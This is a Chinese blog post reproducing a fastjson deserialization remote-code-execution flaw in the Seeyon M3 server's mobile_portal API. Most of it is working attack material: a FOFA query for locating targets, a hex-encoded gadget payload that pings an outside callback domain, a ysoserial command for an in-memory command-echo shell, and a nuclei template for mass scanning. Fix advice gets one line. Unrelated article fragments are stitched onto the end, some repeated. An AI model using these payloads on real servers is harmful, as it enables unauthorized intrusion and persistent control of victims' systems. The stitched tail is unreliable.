漏洞复现--致远 M3 反序列化 mobile_portal RCE_m3反序列化

免责声明：

文章中涉及的漏洞均已修复，敏感信息均已做打码处理，文章仅做经验分享用途，切勿当真，未授权的攻击属于非法行为！文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任，一旦造成后果请自行负责
一：漏洞描述

M3server提供了多种功能模块，涵盖了办公自动化、项目管理、文档管理、流程管理、日程安排、知识管理等方面。该产品mobile_portal接口存在fastjson反序列化
二：漏洞影响版本

致远M3 server
三：网络空间测绘查询

fofa:
title="M3-Server"
四：漏洞复现

利用CB1链生成hex代码，替换POC中的HEX

POC:
POST /mobile_portal/api/pns/message/send/batch/6_1sp1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Content-Type: application/json
Content-Length: 13458
[{"userMessageId":"{\"@\u0074\u0079\u0070\u0065\":\"\u0063\u006f\u006d\u002e\u006d\u0063\u0068\u0061\u006e\u0067\u0065\u002e\u0076\u0032\u002e\u0063\u0033\u0070\u0030\u002e\u0057\u0072\u0061\u0070\u0070\u0065\u0072\u0043\u006f\u006e\u006e\u0065\u0063\u0074\u0069\u006f\u006e\u0050\u006f\u006f\u006c\u0044\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\",\"\u0075\u0073\u0065\u0072\u004f\u0076\u0065\u0072\u0072\u0069\u0064\u0065\u0073\u0041\u0073\u0053\u0074\u0072\u0069\u006e\u0067\":\"\u0048\u0065\u0078\u0041\u0073\u0063\u0069\u0069\u0053\u0065\u0072\u0069\u0061\u006c\u0069\u007a\u0065\u0064\u004d\u0061\u0070:aced0005737200176a6176612e7574696c2e5072696f72697479517565756594da30b4fb3f82b103000249000473697a654c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6d70617261746f723b7870000000027372002b6f72672e6170616368652e636f6d6d6f6e732e6265616e7574696c732e4265616e436f6d70617261746f72e3a188ea7322a4480200024c000a636f6d70617261746f7271007e00014c000870726f70657274797400124c6a6176612f6c616e672f537472696e673b78707372003f6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e636f6d70617261746f72732e436f6d70617261626c65436f6d70617261746f72fbf49925b86eb13702000078707400106f757470757450726f706572746965737704000000037372003a636f6d2e73756e2e6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e747261782e54656d706c61746573496d706c09574fc16eacab3303000649000d5f696e64656e744e756d62657249000e5f7472616e736c6574496e6465785b000a5f62797465636f6465737400035b5b425b00065f636c6173737400125b4c6a6176612f6c616e672f436c6173733b4c00055f6e616d6571007e00044c00115f6f757470757450726f706572746965737400164c6a6176612f7574696c2f50726f706572746965733b787000000000ffffffff757200035b5b424bfd19156767db37020000787000000002757200025b42acf317f8060854e00200007870000006f4cafebabe00000034005e09003300340800350a0004003607003708003808003909001b003a08001d08003b0a003c003d0a003c003e07003f0a000c00400a001c004109001b00420800430a001b004408004508001f09001b004608004709001b00480700490a001700410a0017004a0a0017004b07004c07004d010003636d640100124c6a6176612f6c616e672f537472696e673b0100086973537461746963010003796573010004666c61670100057374617274010003282956010004436f646501000f4c696e654e756d6265725461626c6501000d537461636b4d61705461626c6507004e07003f0100063c696e69743e07004c0100097472616e73666f726d010072284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b5b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b295601000a457863657074696f6e7307004f0100a6284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b29560100083c636c696e69743e01000a536f7572636546696c6501001052756e74696d65457865632e6a6176610700500c0051001e0100012f0c005200530100106a6176612f6c616e672f537472696e670100072f62696e2f73680100022d630c001d001e0100022f430700540c005500560c005700580100136a6176612f696f2f494f457863657074696f6e0c005900230c002900230c0021001e01000b69735374617469635965730c0022002301001870696e672077786e636876796b69612e64677268332e636e0c001f001e0100035965730c0020001e0100176a6176612f6c616e672f537472696e674275696c6465720c005a005b0c005c005d010008417953516c50466b010040636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f72756e74696d652f41627374726163745472616e736c65740100135b4c6a6176612f6c616e672f537472696e673b010039636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f5472616e736c6574457863657074696f6e01000c6a6176612f696f2f46696c65010009736570617261746f72010006657175616c73010015284c6a6176612f6c616e672f4f626a6563743b295a0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010028285b4c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b01000f7072696e74537461636b5472616365010006617070656e6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e674275696c6465723b010008746f537472696e6701001428294c6a6176612f6c616e672f537472696e673b0021001b001c00000004000a001d001e0000000a001f001e0000000a0020001e0000000a0021001e0000000500090022002300010024000000990004000200000049b200011202b6000399001b06bd0004590312055359041206535905b20007534ba7001806bd0004590312085359041209535905b20007534bb8000a2ab6000b57a700084c2bb6000db10001003800400043000c0002002500000022000800000016000b0017002300190038001d004000200043001e0044001f0048002100260000000e000423fc00140700274a07002804000100290023000100240000004900020001000000132ab7000eb2000f1210b600039a0006b80011b10000000200250000001200040000002700040028000f00290012002a00260000000c0001ff0012000107002a00000001002b002c00020024000000190000000300000001b10000000100250000000600010000002d002d000000040001002e0001002b002f00020024000000190000000400000001b100000001002500000006000100000030002d000000040001002e000800300023000100240000007000020000000000371212b300071213b300141215b30016bb001759b70018b20014b60019b20016b60019b6001ab3000fb2000f1210b60003990006b80011b10000000200250000001e00070000001000050011000a0012000f002300280024003300250036002600260000000300013600010031000000020032757200025b42acf317f8060854e00200007870000001d4cafebabe00000032001b0a0003001507001707001807001901001073657269616c56657273696f6e5549440100014a01000d436f6e7374616e7456616c75650571e669ee3c6d47180100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c6501000474686973010003466f6f01000c496e6e6572436c61737365730100254c79736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324466f6f3b01000a536f7572636546696c6501000c476164676574732e6a6176610c000a000b07001a01002379736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324466f6f0100106a6176612f6c616e672f4f626a6563740100146a6176612f696f2f53657269616c697a61626c6501001f79736f73657269616c2f7061796c6f6164732f7574696c2f47616467657473002100020003000100040001001a000500060001000700000002000800010001000a000b0001000c0000002f00010001000000052ab70001b100000002000d0000000600010000003c000e0000000c000100000005000f001200000002001300000002001400110000000a00010002001600100009707400084551505a56504a42707701007871007e000d78;\"}|","channelId":"111","title":"111","content":"222","deviceType":"androidphone","serviceProvider":"baidu","deviceFirm":"other"}]

 200成功
 再请求/mobile_portal/api/systemLog/pns/loadLog/app.log接口 
GET /mobile_portal/api/systemLog/pns/loadLog/app.log HTTP/1.1
Host: x.x.x.x
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate

 成功执行ping命令
 
 使用ysoserial生成CB链TomcatCmdEcho回显内存马
 https://github.com/Y4er/ysoserial
 java -jar ysoserial-main-49888d3191-1.jar CommonsBeanutils192NOCC "CLASS:TomcatCmdEcho" | hex
 
 替换HEX
 
 执行命令，在请求内容加上cmd执行命令回显 
GET /mobile_portal/api/systemLog/pns/loadLog/app.log HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
cmd: whoami
五：批量检测
 
id: seeyon-m3server-mobile_portal-rce
info:
  name: 致远M3server反序列化RCE漏洞
  author: fgz
  severity: critical
  description: '致远M3 server中 mobile_portal接口处发现了fastjson反序列化漏洞，漏洞是通过接口/mobile_portal/api/pns/message/send/batch/6_1sp1将恶意payload存入日志中，然后利用/mobile_portal/api/systemLog/pns/loadLog/app.log接口会将日志中的JSON数据进行反序列化的机制触发Fastjson漏洞,造成反序列化远程代码执行。'
  tags: 2023,seeyon,m3server,rce
  metadata:
    max-request: 3
    fofa-query: title="M3-Server"
    verified: true
http:
  - raw:
        POST /mobile_portal/api/pns/message/send/batch/6_1sp1 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Connection: close
        Upgrade-Insecure-Requests: 1
        Sec-Fetch-Dest: document
        Sec-Fetch-Mode: navigate
        Sec-Fetch-Site: none
        Sec-Fetch-User: ?1
        Content-Type: application/json
        [{"userMessageId":"{\"@\u0074\u0079\u0070\u0065\":\"\u0063\u006f\u006d\u002e\u006d\u0063\u0068\u0061\u006e\u0067\u0065\u002e\u0076\u0032\u002e\u0063\u0033\u0070\u0030\u002e\u0057\u0072\u0061\u0070\u0070\u0065\u0072\u0043\u006f\u006e\u006e\u0065\u0063\u0074\u0069\u006f\u006e\u0050\u006f\u006f\u006c\u0044\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\",\"\u0075\u0073\u0065\u0072\u004f\u0076\u0065\u0072\u0072\u0069\u0064\u0065\u0073\u0041\u0073\u0053\u0074\u0072\u0069\u006e\u0067\":\"\u0048\u0065\u0078\u0041\u0073\u0063\u0069\u0069\u0053\u0065\u0072\u0069\u0061\u006c\u0069\u007a\u0065\u0064\u004d\u0061\u0070:aced0005737200176a6176612e7574696c2e5072696f72697479517565756594da30b4fb3f82b103000249000473697a654c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6d70617261746f723b7870000000027372002b6f72672e6170616368652e636f6d6d6f6e732e6265616e7574696c732e4265616e436f6d70617261746f72e3a188ea7322a4480200024c000a636f6d70617261746f7271007e00014c000870726f70657274797400124c6a6176612f6c616e672f537472696e673b78707372002a6a6176612e6c616e672e537472696e672443617365496e73656e736974697665436f6d70617261746f7277035c7d5c50e5ce02000078707400106f757470757450726f706572746965737704000000037372003a636f6d2e73756e2e6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e747261782e54656d706c61746573496d706c09574fc16eacab3303000649000d5f696e64656e744e756d62657249000e5f7472616e736c6574496e6465785b000a5f62797465636f6465737400035b5b425b00065f636c6173737400125b4c6a6176612f6c616e672f436c6173733b4c00055f6e616d6571007e00044c00115f6f757470757450726f706572746965737400164c6a6176612f7574696c2f50726f706572746965733b787000000000ffffffff757200035b5b424bfd19156767db37020000787000000002757200025b42acf317f8060854e00200007870000014afcafebabe0000003301050a004500890a008a008b0a008a008c0a001d008d08007a0a001b008e0a008f00900a008f009107007b0a008a00920800930a002000940800950800960700970800980800580700990a001b009a08009b08007007009c0b0016009d0b0016009e08006708009f0700a00a001b00a10700a20a00a300a40800a50700a60800a70a002000a80800a909002500aa0700ab0a002500ac0800ad0a00ae00af0a002000b00800b10800b20800b30800b40800b50700b60700b70a003000b80a003000b90a00ba00bb0a002f00bc0800bd0a002f00be0a002f00bf0a002000c00800c10a001b00c20a001b00c30800c40700640a001b00c50800c60700c70800c80800c90700ca0701030700cc0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c650100047468697301002c4c79736f73657269616c2f7061796c6f6164732f74656d706c617465732f546f6d636174436d644563686f3b0100097472616e73666f726d010072284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b5b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b2956010008646f63756d656e7401002d4c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b01000868616e646c6572730100425b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b01000a457863657074696f6e730700cd0100a6284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b29560100086974657261746f720100354c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b01000768616e646c65720100414c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b0100083c636c696e69743e010001650100204c6a6176612f6c616e672f4e6f537563684669656c64457863657074696f6e3b010003636c730100114c6a6176612f6c616e672f436c6173733b010004766172350100214c6a6176612f6c616e672f4e6f537563684d6574686f64457863657074696f6e3b010004636d64730100135b4c6a6176612f6c616e672f537472696e673b010006726573756c740100025b4201000970726f636573736f720100124c6a6176612f6c616e672f4f626a6563743b010003726571010004726573700100016a01000149010001740100124c6a6176612f6c616e672f5468726561643b0100037374720100124c6a6176612f6c616e672f537472696e673b0100036f626a01000a70726f636573736f72730100104c6a6176612f7574696c2f4c6973743b0100154c6a6176612f6c616e672f457863657074696f6e3b01000169010004666c61670100015a01000567726f75700100174c6a6176612f6c616e672f54687265616447726f75703b010001660100194c6a6176612f6c616e672f7265666c6563742f4669656c643b010007746872656164730100135b4c6a6176612f6c616e672f5468726561643b01000d537461636b4d61705461626c650700ce0700cf0700d00700a60700a207009907009c0700620700c70700ca01000a536f7572636546696c65010012546f6d636174436d644563686f2e6a6176610c004600470700d00c00d100d20c00d300d40c00d500d60c00d700d80700cf0c00d900da0c00db00dc0c00dd00de010004657865630c00df00e0010004687474700100067461726765740100126a6176612f6c616e672f52756e6e61626c6501000674686973243001001e6a6176612f6c616e672f4e6f537563684669656c64457863657074696f6e0c00e100d6010006676c6f62616c01000e6a6176612f7574696c2f4c6973740c00e200e30c00db00e401000b676574526573706f6e736501000f6a6176612f6c616e672f436c6173730c00e500e60100106a6176612f6c616e672f4f626a6563740700e70c00e800e90100096765744865616465720100106a6176612f6c616e672f537472696e67010003636d640c00ea00eb0100097365745374617475730c00ec005e0100116a6176612f6c616e672f496e74656765720c004600ed0100076f732e6e616d650700ee0c00ef00f00c00f100de01000377696e010007636d642e6578650100022f630100092f62696e2f626173680100022d630100116a6176612f7574696c2f5363616e6e65720100186a6176612f6c616e672f50726f636573734275696c6465720c004600f20c00f300f40700f50c00f600f70c004600f80100025c410c00f900fa0c00fb00de0c00fc00fd0100246f72672e6170616368652e746f6d6361742e7574696c2e6275662e427974654368756e6b0c00fe00ff0c0100010101000873657442797465730c010200e6010007646f577269746501001f6a6176612f6c616e672f4e6f537563684d6574686f64457863657074696f6e0100136a6176612e6e696f2e42797465427566666572010004777261700100136a6176612f6c616e672f457863657074696f6e01002a79736f73657269616c2f7061796c6f6164732f74656d706c617465732f546f6d636174436d644563686f010040636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f72756e74696d652f41627374726163745472616e736c6574010039636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f5472616e736c6574457863657074696f6e0100156a6176612f6c616e672f54687265616447726f75700100176a6176612f6c616e672f7265666c6563742f4669656c640100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b01000e67657454687265616447726f757001001928294c6a6176612f6c616e672f54687265616447726f75703b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b01000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010008636f6e7461696e7301001b284c6a6176612f6c616e672f4368617253657175656e63653b295a01000d6765745375706572636c61737301000473697a650100032829490100152849294c6a6176612f6c616e672f4f626a6563743b0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100076973456d70747901000328295a01000454595045010004284929560100106a6176612f6c616e672f53797374656d01000b67657450726f7065727479010026284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e673b01000b746f4c6f77657243617365010016285b4c6a6176612f6c616e672f537472696e673b2956010005737461727401001528294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b010018284c6a6176612f696f2f496e70757453747265616d3b295601000c75736544656c696d69746572010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f7574696c2f5363616e6e65723b0100046e657874010008676574427974657301000428295b42010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b01000b6e6577496e7374616e636501001428294c6a6176612f6c616e672f4f626a6563743b0100116765744465636c617265644d6574686f6401003979736f73657269616c2f7061796c6f6164732f74656d706c617465732f546f6d636174436d644563686f39383334393531333839303130323301003b4c79736f73657269616c2f7061796c6f6164732f74656d706c617465732f546f6d636174436d644563686f3938333439353133383930313032333b002100440045000000000004000100460047000100480000002f00010001000000052ab70001b100000002004900000006000100000009004a0000000c000100000005004b010400000001004d004e000200480000003f0000000300000001b100000002004900000006000100000057004a00000020000300000001004b0104000000000001004f0050000100000001005100520002005300000004000100540001004d005500020048000000490000000400000001b10000000200490000000600010000005c004a0000002a000400000001004b0104000000000001004f005000010000000100560057000200000001005800590003005300000004000100540008005a004700010048000005d500080011000002fd033bb80002b600034c2bb600041205b600064d2c04b600072c2bb60008c00009c000094e03360415042dbea202cd2d1504323a051905c70006a702b91905b6000a3a061906120bb6000c9a000d1906120db6000c9a0006a7029b1905b60004120eb600064d2c04b600072c1905b600083a071907c1000f9a0006a702781907b600041210b600064d2c04b600072c1907b600083a071907b600041211b600064da700163a081907b60004b60013b600131211b600064d2c04b600072c1907b600083a071907b60004b600131214b600064da700103a081907b600041214b600064d2c04b600072c1907b600083a071907b600041215b600064d2c04b600072c1907b60008c00016c000163a0803360915091908b900170100a201cb19081509b9001802003a0a190ab600041219b600064d2c04b600072c190ab600083a0b190bb60004121a03bd001bb6001c190b03bd001db6001e3a0c190bb60004121f04bd001b5903122053b6001c190b04bd001d5903122153b6001ec000203a061906c601571906b600229a014f190cb60004122304bd001b5903b2002453b6001c190c04bd001d5903bb0025591100c8b7002653b6001e571227b80028b60029122ab6000c99001906bd00205903122b535904122c535905190653a7001606bd00205903122d535904122e5359051906533a0dbb002f59bb003059190db70031b60032b60033b700341235b60036b60037b600383a0e1239b8003a3a0f190fb6003b3a07190f123c06bd001b5903123d535904b20024535905b2002453b6003e190706bd001d5903190e535904bb00255903b70026535905bb002559190ebeb7002653b6001e57190cb60004123f04bd001b5903190f53b6001c190c04bd001d5903190753b6001e57a7004e3a0f1241b8003a3a101910124204bd001b5903123d53b6003e191004bd001d5903190e53b6001e3a07190cb60004123f04bd001b5903191053b6001c190c04bd001d5903190753b6001e57043b1a990006a70009840901a7fe2f1a990006a70011a700083a05a70003840401a7fd32a700044bb10008009500a000a3001200c300d100d400120213028602890040002e003902ed0043003c005702ed0043005a007a02ed0043007d02e702ed0043000002f802fb004300030049000000fe003f0000000d0002000e0009000f001300100018001100240012002e001400340015003c001600430017005a001800650019006a001a0072001b007d001c0088001d008d001e0095002000a0002300a3002100a5002200b6002400bb002500c3002700d1002a00d4002800d6002900e1002b00e6002c00ee002d00f9002e00fe002f010c0030011b0031012600320131003301360034013e003501570036017d0037018a003801b5003901f0003a0213003c021a003d0221003e0264003f0286004402890040028b00410292004202b2004302d4004502d6004702dd003002e3004902ea004c02ed004a02ef004b02f2001202f8005002fb004f02fc0051004a000000d4001500a50011005b005c000800d6000b005b005c0008021a006c005d005e000f02920042005d005e0010028b0049005f0060000f01f000e600610062000d021300c300630064000e012601b700650066000a013e019f00670066000b0157018600680066000c010f01d40069006a0009003402b6006b006c0005004302a7006d006e000600720278006f00660007010c01de00700071000802ef0003005b00720005002702d10073006a0004000202f6007400750000000902ef007600770001001302e5007800790002002402d4007a007b0003007c000000a80017ff002700050107007d07007e070009010000fc001407007ffc001a07008002fc002207008165070082125d0700820cfd002d07008301fe00cb07008107008107008152070084ff009a000f0107007d07007e0700090107007f0700800700810700830107008107008107008107008407003d0001070085fb004af90001f80006fa0005ff000600050107007d07007e0700090100004207008604ff0005000000004207008600000100870000000200887571007e0010000001d4cafebabe00000033001b0a0003001507001707001807001901001073657269616c56657273696f6e5549440100014a01000d436f6e7374616e7456616c75650571e669ee3c6d47180100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c6501000474686973010003466f6f01000c496e6e6572436c61737365730100254c79736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324466f6f3b01000a536f7572636546696c6501000c476164676574732e6a6176610c000a000b07001a01002379736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324466f6f0100106a6176612f6c616e672f4f626a6563740100146a6176612f696f2f53657269616c697a61626c6501001f79736f73657269616c2f7061796c6f6164732f7574696c2f47616467657473002100020003000100040001001a000500060001000700000002000800010001000a000b0001000c0000002f00010001000000052ab70001b100000002000d000000060001000000c7000e0000000c000100000005000f001200000002001300000002001400110000000a00010002001600100009707400084448434e57504c53707701007871007e000d78;\"}|","channelId":"111","title":"111","content":"222","deviceType":"androidphone","serviceProvider":"baidu","deviceFirm":"other"}]
        GET /mobile_portal/api/systemLog/pns/loadLog/app.log HTTP/1.1
        Host: {{Hostname}}
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        cmd: whoami
    matchers:
      - type: dsl
          - "status_code_1 == 200 && contains((body_1), 'Success') && status_code_2 == 200 && contains((body_1), '\')"

 
 六：修复建议
 严格限制/mobile_portal/接口的访问权限，关注厂家官网获取修复补丁。
                                    致远M3 server中 mobile_portal接口处发现了fastjson反序列化漏洞，漏洞是通过接口/mobile_portal/api/pns/message/send/batch/6_1sp1将恶意payload存入日志中，然后利用/mobile_portal/api/systemLog/pns/loadLog/app.log接口会将日志中的JSON数据进行反序列化的机制触发Fastjson漏洞,造成反序列化远程代码执行。
1、序列化
序列化serialize()
序列化说通俗点就是把一个对象变成可以传输的字符串,序列化的目的是方便数据的传输和存储。在PHP应用中，序列化和反序列化一般用做缓存，比如session缓存，cookie等。
常见的序列化格式：
二进制格式
json字符串
xml字符串
比如下面是一个对象:
    class S{
        public $test="pikachu";
    $s=new S(); //创建一个对象
    serialize($s
                                    事物序列化Today, it’s easy to say that almost everything we do, everything we use, and even everything around us is capable of producing data. But what is even more true, is that this data is produced in r...
                                    致远M3 server中 mobile_portal接口处存在fastjson反序列化漏洞，漏洞是通过接口/mobile_portal/api/pns/message/send/batch/6_1sp1将恶意payload存入日志中，然后利用/mobile_portal/api/systemLog/pns/loadLog/app.log接口会将日志中的JSON数据进行反序列化的机制触发Fastjson漏洞,造成反序列化远程代码执行。
	漏洞等级：高危
	漏洞影响：服务器服务中的漏洞可能允许远程执行代码
	受影响的操作系统： Windows 2000;XP;Server 2003;Vista;Server 2008;7 Beta
	漏洞原理：攻击者通过特制的RPC请求发给存在漏洞的主机，将可导...
                                    致远M3 server中 mobile_portal接口处存在fastjson反序列化漏洞，漏洞是通过接口/mobile_portal/api/pns/message/send/batch/6_1sp1将恶意payload存入日志中，然后利用/mobile_portal/api/systemLog/pns/loadLog/app.log接口会将日志中的JSON数据进行反序列化的机制触发Fastjson漏洞,造成反序列化远程代码执行。
                                    前言有点相似Zabbix是一种企业监控解决方案，旨在使组织能够监控其网络中各种系统的健康状况和状态，包括：网络服务，服务器和网络设备。前些日子Lilith Wyatt of Cisco ASIG 发现利用命令注入的形式可以在Zabbix Server上实现远程代码执行，影响的版本为Zabbix 2.4.7 – 2.4.8r1。在复现过程中发现利用条件比较苛刻，首先需要能访问到Zabbix Serv...
                                    开发web应用 - Developing web applications
Spring Boot 非常适合开发web应用.你可以非常轻松的使用嵌入式的容器例如:Tomcat,Jetty,Undertow或者Netty来创建HTTP服务器,大多数Web应用程序都可以使用spring-boot-starter-web来快速启动和运行.你也可以使用spring-boot-starter-webflux...
                                    　版权声明：本文为博主原创文章，未经博主允许不得转载。 
在现在web开发中，应该有很多的公司已经开始受到前后端分离思想的影响。已经做到了前后端分离，后端在既定约定好的数据格式下进行开发，会导致数据结构与从数据库或者nosql中获取的数据结构太过抽象，而对数据无从下手的情况。
　　本文是我对数据在不使用组件的情况下对数据的处理。当然用Java开发可以使用到mybatis的collection对...
                                    在加载阶段也是最重要的阶段，当我们去new对象的时候他就会导致加载字节码，他会将字节码加载到内存的堆中，他会生成Class类对象，这个Class类对象中包含成员变量，方法，构造器等等。该对象知道他是属于那个Class对象的。例如如下代码: 当我们输入其他数字的时候他会输出no，当我们输入2的时候他才会报错，也就是说他在编译器是没有报错的，只会在运行时用这个类的时候才会报错。例如如下代码，这里的Dog这个类是不存在的，当我们去运行的时候他会直接在编译的时候就会报错，这就体现出了编译时会加载相关的类。